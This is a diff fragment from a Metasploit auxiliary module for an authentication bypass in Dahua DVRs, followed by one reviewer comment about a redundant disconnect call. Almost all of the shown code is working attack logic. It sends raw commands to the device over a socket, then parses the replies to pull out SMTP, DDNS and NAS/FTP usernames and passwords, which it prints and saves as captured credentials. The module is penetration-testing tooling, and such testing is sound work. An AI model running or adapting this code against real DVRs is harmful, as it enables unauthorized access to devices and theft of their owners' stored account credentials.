modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb

```diff
@@ -0,0 +1,395 @@
+    print_good("#{peer} -- Email Settings:")
+    return unless data.first =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i
+    if mailhost = Regexp.last_match[1].split(':')
+      print_status("  Server: #{mailhost[0]}") unless mailhost[0].blank?
+      print_status("  Server Port: #{mailhost[1]}") unless mailhost[1].blank?
+      print_status("  Destination Email: #{data[1]}") unless data[1].blank?
+      mailserver = "#{mailhost[0]}"
+      mailport = "#{mailhost[1]}"
+    end
+    return unless data[5].blank? && data[6].blank?
+    print_good("  SMTP User: #{data[5]}")
+    print_good("  SMTP Password: #{data[6]}")
+    muser = "#{data[5]}"
+    mpass = "#{data[6]}"
+    return unless mailserver.blank? && mailport.blank? && muser.blank? && mpass.blank?
+    report_email_creds(mailserver, mailport, muser, mpass)
+  end
+
+  def grab_ddns
+    connect
+    sock.put(DDNS)
+    return unless (response = sock.get_once)
+    data = response.split(/&&[0-1]&&/)
+    ddns_table = Rex::Ui::Text::Table.new(
+      'Header' => 'Dahua DDNS Settings',
+      'Indent' => 1,
+      'Columns' => ['DDNS Service', 'DDNS Server', 'DDNS Port', 'Domain', 'Username', 'Password']
+    )
+    data.each_with_index do |val, index|
+      next if index == 0
+      val = val.split("&&")
+      ddns_service = "#{val[0]}"
+      ddns_server = "#{val[1]}"
+      ddns_port = "#{val[2]}"
+      ddns_domain = "#{val[3]}"
+      ddns_user = "#{val[4]}"
+      ddns_pass = "#{val[5]}"
+      ddns_table << ["#{ddns_service}", "#{ddns_server}", "#{ddns_port}", "#{ddns_domain}", "#{ddns_user}", "#{ddns_pass}"]
+      unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank?
+        ddns_table.print
+        report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass)
+      end
+    end
+  end
+
+  def grab_nas
+    connect
+    sock.put(NAS)
+    return unless (data = sock.get_once)
+    print_good("#{peer} -- NAS Settings:")
+    server = ''
+    port = ''
+    if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/
+      server = Regexp.last_match[1].unpack('C*').join('.')
+      port = Regexp.last_match[2].unpack('S')
+    end
+    if /[\x00]{16,}(?<ftpuser>[[:print:]]+)[\x00]{16,}(?<ftppass>[[:print:]]+)/ =~ data
+      ftpuser.strip!
+      ftppass.strip!
+      unless ftpuser.blank? || ftppass.blank?
+        print_good(" Nas Server: #{server}")
+        print_good(" Nas Port: #{port}")
+        print_good(" FTP User: #{ftpuser}")
+        print_good(" FTP Pass: #{ftppass}")
+        report_creds(
+          host: server,
+          port: port,
+          user: ftpuser,
+          pass: ftppass,
+          type: "FTP",
+          active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil?
+      end
+    end
+  end
+
+  def grab_channels
+    connect
+    sock.put(CHANNELS)
+    data = sock.get_once.split('&&')
+    disconnect
```

Comment:
This is probably unnecessary, right?  The disconnect is already done in `run_host`